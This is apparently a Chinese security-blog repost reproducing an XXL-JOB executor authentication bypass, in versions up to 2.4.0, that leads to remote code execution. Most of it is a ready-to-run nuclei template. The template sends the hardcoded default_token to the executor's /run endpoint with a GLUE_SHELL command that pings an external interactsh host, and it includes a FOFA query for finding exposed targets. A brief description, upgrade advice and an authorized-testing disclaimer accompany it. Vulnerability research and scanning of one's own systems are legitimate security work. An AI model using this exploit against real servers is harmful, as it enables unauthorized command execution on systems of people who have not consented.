【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞

admin
admin
admin
102369
文章
87
评论
2023年11月3日02:22:07评论140 views字数 1334阅读4分26秒阅读模式

漏洞描述
【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞
漏洞描述
【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞
XXL-JOB存在身份认证绕过漏洞,攻击者利用该漏洞可执行任意代码。
【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞
影响版本
【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞
xxl-job≤2.4.0
【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞
复现脚本
【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞

nuclei脚本:

id: xxl-job-executor-default-accessToken-RCE

info:  name: xxl-job-executor-default-accessToken-RCE  author: known  severity: high  description: XXL-JOB 默认 accessToken 身份绕过,可导致 RCE  metadata:    max-request: 1    verified: true    fofa-query: app="XXL-JOB"  tags: xxl-job,rce

variables:  filename: "{{to_lower(rand_base(10))}}"  servicename: "{{to_lower(rand_base(20))}}"  randjobid: "{{rand_int(999,999999)}}"  datetime: '{{date_time("%Y-%M-%D %H:%m:%s")}}'  unix_time: '{{date_time("{{datetime}}",unix_time())}}'http:  - raw:      - |        @timeout: 25s        POST /run HTTP/1.1        Host: {{Host}}:9999        XXL-JOB-ACCESS-TOKEN: default_token        Content-Type: application/json

        {          "jobId": {{randjobid}},          "executorHandler": "demoJobHandler",          "executorParams": "demoJobHandler",          "executorBlockStrategy": "COVER_EARLY",          "executorTimeout": 0,          "logId": {{randjobid}},          "logDateTime": {{unix_time}},          "glueType": "GLUE_SHELL",          "glueSource": "ping {{Host}}.{{randjobid}}.{{interactsh-url}}",          "glueUpdatetime": {{unix_time}},          "broadcastIndex": 0,          "broadcastTotal": 0        }

    req-condition: true    matchers-condition: and    matchers:      - type: word        part: interactsh_protocol        words:          - "dns"
【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞
修复方案
【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞
当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。 https://www.xuxueli.com/xxl-job/

注:本文中提到的漏洞验证 poc 或工具仅用于授权测试,任何未经授权的测试均属于非法行为。任何人不得利用本文中的技术手段或工具进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。

【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞
喜欢就关注我吧,订阅更多最新消息

原文始发于微信公众号(扫地僧的茶饭日常):【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月3日02:22:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞https://cn-sec.com/archives/2171176.html

发表评论

匿名网友 填写信息